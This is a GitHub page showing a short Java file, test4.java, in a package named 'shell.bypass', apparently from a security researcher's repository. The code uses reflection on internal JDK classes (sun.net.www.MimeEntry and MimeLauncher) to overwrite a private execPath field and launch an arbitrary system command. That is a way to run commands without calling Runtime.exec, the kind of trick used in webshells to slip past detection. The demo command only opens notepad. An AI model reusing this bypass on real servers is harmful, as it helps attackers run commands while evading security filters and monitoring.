forked from Firebasky/Java
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtest4.java
More file actions
36 lines (29 loc) · 1.38 KB
/
test4.java
File metadata and controls
36 lines (29 loc) · 1.38 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
package shell.bypass;
import sun.net.www.MimeEntry;
import java.io.InputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.net.URL;
import java.net.URLConnection;
public class test4 {
public static void main(String[] args)throws Exception {
bypass("notepad");
}
public static void bypass(String cmd) throws Exception{
Class aClass = Class.forName("sun.net.www.MimeEntry");
Constructor d = aClass.getDeclaredConstructor(String.class,int.class,String.class,String.class);
d.setAccessible(true);
MimeEntry obj =(MimeEntry) d.newInstance("Firebasky", 1314, "C:\\windows\\win.ini", "%s");
URL url = new URL("http://127.0.0.1:8000");
URLConnection urlConnection = url.openConnection();
InputStream inputStream = urlConnection.getInputStream();
Class C = Class.forName("sun.net.www.MimeLauncher");
Constructor declaredConstructor = C.getDeclaredConstructor(MimeEntry.class, URLConnection.class, InputStream.class, String.class, String.class);
declaredConstructor.setAccessible(true);;
Thread o = (Thread)declaredConstructor.newInstance(obj,urlConnection, inputStream, "", "");
Field execPath = C.getDeclaredField("execPath");
execPath.setAccessible(true);
execPath.set(o,cmd);
o.run();
}
}